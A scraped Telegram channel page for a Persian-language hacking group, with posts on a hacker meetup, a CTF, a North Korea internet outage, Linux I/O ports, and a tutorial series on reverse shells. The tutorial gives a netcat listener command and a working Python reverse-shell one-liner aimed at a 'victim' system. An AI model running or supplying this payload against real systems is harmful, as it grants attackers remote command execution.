Cyber Souls
❕Official Channel of CyberSouls Team ❕A hacker is a programmer, but a programmer may not be a hacker. ❗️Admims: t.me/CyberSoulsAdmins ❗️Discussion GP: @CyberSoulzGP ❗️Donate: https://u.cybersouls.tk/3
إظهار المزيدلم يتم تحديد البلدلم يتم تحديد اللغةالفئة غير محددة
4 179
المشتركون
لا توجد بيانات24 ساعات
لا توجد بيانات7 أيام
لا توجد بيانات30 أيام
- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
معدل نمو المشترك
جاري تحميل البيانات...
Repost from RavinAcademy
Photo unavailableShow in Telegram
✨ رویداد «هکرهای دوستداشتنی»
🥁 دورهمی هکرهای قانونمند رو «یاشار شاهینزاده» مطرح کرد و با استقبال گستردهی علاقهمندان روبرو شد. حالا آکادمی راوین حامی این گردهماییه و رویداد #هکرهای_دوست_داشتنی در نمایشگاه Inotex 2022 برگزار میشه. اطلاعات بیشتر در مورد این رویداد رو میتونید از لینک زیر دنبال کنید.
🔗 ravinacademy.com/lovely_hackers
📣 حضور در این رویداد رایگانه و نیازی به ثبتنام نیست.
💬 نظرات و پیشنهاداتتون در مورد این رویداد رو توی شبکههای اجتماعی با هشتگ #هکرهای_دوست_داشتنی برامون بنویسید.
@RavinAcademy
#ReverseShell
مثال از ReverseShell
❕ترمینال پایینی، شبیه ساز سیستم خودم
❕ترمینال بالایی، شبیه ساز سیستم قربانی
❗️بعد از وصل شدن، مهاجم میتونه دستورای مورد نظرشو به راحتی توی سیستم قربانی اجرا کنه.
[پستای قبلی #ReverseShell رو هم نگاه کنید]
❗ فرمت فیلم درست شد.
✅ @CyberSoulz
4.53 MB
#ReverseShell
مثال از ReverseShell
❕ترمینال پایینی، شبیه ساز سیستم خودم
❕ترمینال بالایی، شبیه ساز سیستم قربانی
❗️بعد از وصل شدن، مهاجم میتونه دستورای مورد نظرشو به راحتی توی سیستم قربانی اجرا کنه.
[پستای قبلی #ReverseShell رو هم نگاه کنید]
✅ @CyberSoulz
Screencast 2022-02-02 14:22:15.mp41.45 MB
#CTF
امشب ساعت ۱۲:۳۰ این مسابقه شروع میشه، اسپانسر های نسبتا خوبی هم داره، بریم ببینیم چی میشه ✌🏽
اگه میخواید میتونید از لینک زیر ثبت نام کنید:
https://ctf.dicega.ng/
✅ @CyberSoulz
#FYI
اینترنت کرهشمالی در نتیجه یک حمله سایبری قطع شد.
جالبه بدونید که این حمله سایبری توسط یه شخص انجام شده نه یک تیم سایبری دولتی
ظاهرا هکر (با اسم مستعار P4x). ،قبلا توسط هکرهای دولتی کرهشمالی آسیب دیده بوده و هک شده و بعد از اینکه از ایالاتمتحده برای پاسخ به حملات سایبری کرهشمالی ناامید میشه ،تصمیم میگیره خودش اقدام کنه با راه اندازی وبسایت در تور و استخدام هکرهای دیگه دست به این حمله میزنن
منبع خبر رو بی اطلاع هستم ولی جالب بود
https://www.wired.com/story/north-korea-hacker-internet-outage/
https://www.dailymail.co.uk/news/article-10473271/US-hacker-pyjamas-takes-North-Koreas-internet.html
✅ @CyberSoulz
North Korea Hacked Him. So He Took Down Its Internet
Disappointed with the lack of US response to the Hermit Kingdom's attacks against US security researchers, one hacker took matters into his own hands.
#ReverseShell
بیشتر از چیزی که فکر کنید این روش آسونه ...
ولی پیدا کردن سیستمی که بتونید این تکنیک رو روش پیدا کنید خیلی راحت نیست.
❗️برای پیاده سازی این تکنیک باید ابتدا یک listener توی سیستم خودمون ایجاد کنیم:
با استفاده از دستور nc میتونیم روی یک port خاص اینکار رو بکنیم:
nc -lp 1337
❗️حالا نیاز داریم تا قربانی به ما وصل بشه، برای این کار باید یه تیکه کد توی سیستم طرف بتونیم اجرا کنیم که تقریبا به تموم زبان های برنامه نویسی میتونیم این کار رو بکنیم، من با python این کار رو میکنم:
فقط دقت کنید که به جای 127.0.0.1 باید ip خودتون رو بزنید.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
❗️و تمام .
❕الان قربانی به شما وصل شده و شما میتونید هر دستوری رو روی سیستمش اجرا کنید.
🔜 معرفی چند ابزار برای ساختن Revershell به زبان های مختلف
✅ @CyberSoulzمثال از ReverseShell
❕ترمینال پایینی، شبیه ساز سیستم خودم
❕ترمینال بالایی، شبیه ساز سیستم قربانی
❗️بعد از وصل شدن، مهاجم میتونه دستورای مورد نظرشو به راحتی توی سیستم قربانی اجرا کنه.
✅ @CyberSoulz
Screencast 2022-02-02 14:22:15.mp41.45 MB
#ReverseShell
یکی از مهم ترین تکنیک های هک سرور ها
Reverse Shell
هست.
❕تو این تکنیک مهاجم تلاش میکنه تا با ترفند های مختلف بتونه دسترسی shell پیدا کنه و با این دسترسی میتونه سطح دسترسی خودشو بالا ببره و کنترل کامل سیستم رو به دست بگیره.
❗️ و در حالی که بیشتر سیستم ها پشت firewall قرار دارند و تقریبا پیدا کردن دسترسی از راه دور به shell غیرممکنه یکی از روش هایی که برای دور زدن این محدودیت ها استفاده میشه Reverse Shell هست
چجوری انجام میشه؟
به جای اینکه ما به سیستم قربانی وصل بشیم و دستوراتی که میخوایم رو اجرا کنیم، ما یک listener توی سیستم خودمون میسازیم و کاری میکنیم که سیستم قربانی به سیستم ما وصل بشه و اون موقع ما درستوراتی که میخوایم رو میتونیم توی سیستمش اجرا کنیم.
و چون سیستم قربانی خودش به ما وصل شده پس چیزی وجود نداره که فایروال جلوشو بگیره :)
🔜 بیشتر از چیزی که فکر کنید این روش آسونه ...
✅ @CyberSoulz#Linux
I/O (input/output) addressing
یا I/O ports آدرس های منحصربفردی داخل مموری براشون رزرو شده برای ارتباط برقرار کردن بین device های خاص و CPU .
پس interrupt یه massage رو از طریق I/O ports صدا میزنه.
داخل فایل proc/ioports/ میتونید آدرس های hardware memory رو ببینید مثلا در عکس بالا آدرس 0060 و 0064 برای keyboard استفاده میشه
✅@CyberSoulz
اختر خطة مختلفة
تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.